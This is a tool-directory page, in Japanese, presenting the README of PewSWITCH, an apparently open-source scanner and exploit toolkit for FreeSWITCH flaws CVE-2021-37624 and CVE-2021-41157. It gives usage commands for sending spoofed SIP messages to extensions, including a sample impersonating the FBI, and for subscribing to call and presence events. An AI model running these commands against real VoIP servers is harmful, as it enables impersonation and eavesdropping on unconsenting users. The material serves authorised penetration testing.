Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
PewSWITCH — FreeSWITCH 向けのスキャンおよびエクスプロイトツールキットで、CVE-2021-37624 と CVE-2021-41157 に対応しています。 | Kitploit
ツール/GitHubGitHub/0xinfection/pewswitch
偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHub0xinfection/pewswitch

PewSWITCH

FreeSWITCH 向けのスキャンおよびエクスプロイトツールキットで、CVE-2021-37624 と CVE-2021-41157 に対応しています。

リポジトリを見る
30914年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

PewSWITCH

FreeSWITCHに特化したCVE-2021-37624およびCVE-2021-41157用のスキャンおよびエクスプロイトツールキットです。

関連ブログ: https://0xinfection.github.io/posts/analyzing-freeswitch-vulns/

使用方法

ツールのヘルプステートメントは以下の通りです。

root@kitploit:~
$ ./pewswitch --help

     ___    .        ____       _ __      __
    / _ \___|\    __/ __/|   __(_) /_____/ /
   / ___/ -_) |/|/ /\ \| |/|/ / / __/ __/ _ \
  /_/   \__/|__,__/___/|__,__/_/\__/\__/_//_/  v0.1

       "where we pew pew pew freeswitch"

Usage of ./pewswitch:
  -cve string
        Specify a specific CVE to scan. Both vulns are tested by default.
  -delay int
        Delay in seconds between subsequent requests. (default 0)
  -events string
        Comma-separated list of events to be subscribed to. All events are monitored by default.
  -expires int
        Maximum value of the 'Expires' header for SUBSCRIBE requests. (default 60)
  -ext-file string
        Specify a file containing extensions instead of '-exts'.
  -exts string
        Comma separated list of extensions to scan.
  -msg-file string
        Specify a CSV file containing messages to be sent (if found vulnerable to CVE-2021-37624).
  -out-dir string
        Output directory to write the results to. (default "./pewswitch-results/")
  -out-format string
        Output format type of the results. Can be either 'json' or 'csv'. (default "json")
  -threads int
        Number of threads to use while scanning. (default 2)
  -user-agent string
        Custom user-agent string to use. (default "pewswitch/0.1")

特定の脆弱性のスキャン

デフォルトでは、ツールは両方の脆弱性をスキャンします。特定の脆弱性のみをテストしたい場合は、-cveフラグを使用して指定できます。

例:

root@kitploit:~
./pewswitch -cve 'cve-2021-37624' -exts 1000 freeserver.voip.com

内線番号の指定

内線番号を指定するには、以下のいずれかの方法を選択できます。

  • -exts引数を使用して、内線番号のカンマ区切りリストを指定します。

    例:

    root@kitploit:~
    ./pewswitch -exts 1000,1001 freeserver.voip.com freeserver1.voip.com:5060
    

    これにより、各内線番号と各ホストのペアの組み合わせがテストされます。上記のコマンドでテストされる最終ターゲットは、[email protected]、[email protected]、[email protected]:5060、[email protected]:5060です。

  • 内線番号を含むファイルを指定します。ファイルを使用する場合、ユーザーとホストの両方を指定する必要があることに注意してください。これは、特定のサーバーで特定の内線番号をテストする必要がある場合に特に便利です。このようなファイルの例(例: extensions-sample.txt)は次のようになります。

    root@kitploit:~
    [email protected]
    [email protected]:5060
    [email protected]:5660
    ...
    

    例:

    root@kitploit:~
    ./pewswitch -ext-file extensions-sample.txt
    

ホストにポートが指定されていない場合、デフォルトの宛先ポートとしてポート5060が使用されることに注意してください。

出力

ツールはJSONとCSVの2つの異なる形式で出力できます。デフォルトの出力形式はJSONです。出力形式は-out-formatスイッチを使用して変更できます。

例:

root@kitploit:~
./pewswitch -exts 1000 -out-format csv freeserver.voip.com 

./pewswitch-results/ディレクトリには、json形式とcsv形式のレポートサンプルがあります。

出力先ディレクトリは-out-dir引数で変更できます。デフォルトの出力ディレクトリは./pewswitch-results/で、ツール実行時にカレントワーキングディレクトリに作成されます。

例:

root@kitploit:~
./pewswitch -ext-file extensions-sample.txt -out-dir /tmp

リクエスト固有の設定

脆弱性の検証/エクスプロイト中にリクエストをカスタマイズできる、追加のパケット固有の設定があります。

MESSAGEパケット

サーバーがCVE-2021-37624に対して脆弱であると判明した場合、デフォルトでは、名前FBI、番号022-324-3000のサンプルメッセージがターゲットの内線番号に送信されます。メッセージの内容はFBI here. Open your door!のようになります。

この動作は、-msg-file引数を使用して変更できます。これは、送信者の名前、電話番号、そして送信するメッセージの内容を含むCSVファイルを受け入れます。このようなファイルの例はmessages-sample.csvです。

root@kitploit:~
sender_name,sender_phone,message
FBI,022-324-3000,FBI here. Open your door!
0xInfection,000-000-0000,Hi. Just confirming the vulnerability.
SPAMMY SALESMAN,BAD-GUY-9999,BUY MY STUFF!

例:

root@kitploit:~
./pewswitch -cve 'cve-2021-27624' -msg-file messages-sample.csv -exts 1000 freeserver.voip.com 

SUBSCRIBEリクエスト

デフォルトでは、ツールはExpiresヘッダーを60秒に設定したSUBSCRIBEリクエストを送信します。その同じ時間枠で、ツールはサーバーからのNOTIFYメッセージをリッスンし続けます。この値は-expiresフラグを使用して変更できます。

例:

root@kitploit:~
./pewswitch -expires 600 -ext-file extensions-sample.txt

ツールはまた、すべてのイベントにサブスクライブすることでNOTIFYメッセージを監視します。すべてのイベントのリストは以下の通りです。

  • talk
  • hold
  • conference
  • as-feature-event
  • dialog
  • line-seize
  • call-info
  • sla
  • include-session-description
  • presence
  • presence.winfo
  • message-summary
  • refer

この動作は、監視するイベントのカンマ区切りリストを受け取る-eventsフラグで変更できます。例:

root@kitploit:~
./pewswitch -cve 'cve-2021-41157' -events message-summary,presence -exts 1000,1002 freeserver.voip.com

セットアップ

Releasesセクションのビルド済みバイナリを使用できます。または、自分でコードをコンパイルしたい場合は、Go 1.13以降が必要です。ツールをビルドするには、go buildを実行するとバイナリが生成されます。

バージョンとライセンス

このツールはMITライセンスの下で利用可能です。ご自由にお使いください。

現在、PewSWITCHはv0.1です。

バグと機能リクエスト

新しいリクエストや機能の提案は、イシューまたはプルリクエストを作成してください。

何か議論したいことがあれば、プロフィールのTwitterまたはメールで連絡してください。

♡ を込めて Pinaki によって作成されました。

ツールをダウンロード